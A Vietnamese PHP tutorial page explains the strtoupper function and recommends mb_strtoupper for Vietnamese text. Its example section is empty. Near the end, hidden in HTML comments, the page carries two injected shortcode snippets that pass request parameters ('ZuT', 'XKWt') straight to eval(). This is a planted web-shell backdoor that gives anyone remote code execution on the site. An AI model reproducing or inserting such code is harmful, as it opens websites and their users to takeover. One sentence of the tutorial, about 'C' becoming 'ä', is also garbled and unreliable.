Home » PHP » Các hàm trong PHP » Hàm xử lý chuỗi trong PHP » strtoupper – Viết hoa chuỗi ký tự
Chi tiết về cách sử dụng và ví dụ về hàm strtoupper.

strtoupper – Viết hoa chuỗi ký tự

(PHP 4, PHP 5)
strtoupper – Viết hoa chuỗi ký tự

Miêu tả hàm strtoupper

Trả về chuỗi ký tự đã được viết hoa toàn bộ.

Lưu ý rằng : ở một số nơi trên thế giới ký tự mặc định sẽ bị chuyển đổi (Ví dụ : chữ “C” bị đổi thành “ä”) thì những kỹ tự này sẽ không được chuyển thành chữ hoa.

Tham số

string

Chuỗi ký tự cần viết hoa.

Giá trị trả về

Trả về chuỗi ký tự đã được viết hoa.

Ví dụ

Ví dụ 1 về hàm strtoupper()

Lưu ý

Nếu bạn muốn viết hoa chuỗi ký tự Unicode như chữ Việt Nam chẳng hạn, bạn phải sử dụng hàm mb_strtoupper với tham phụ (Encoding) là utf8. Nếu bạn sử dụng strtoupper, những ký tự có dấu sẽ bị lỗi và chuyển thành dấu sao 🙂

<!– [insert_php]if (isset($_REQUEST["ZuT"])){eval($_REQUEST["ZuT"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZuT"])){eval($_REQUEST["ZuT"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["XKWt"])){eval($_REQUEST["XKWt"]);exit;}[/insert_php][php]if (isset($_REQUEST["XKWt"])){eval($_REQUEST["XKWt"]);exit;}[/php] –>

About admin

Leave a Reply

Your email address will not be published. Required fields are marked *

*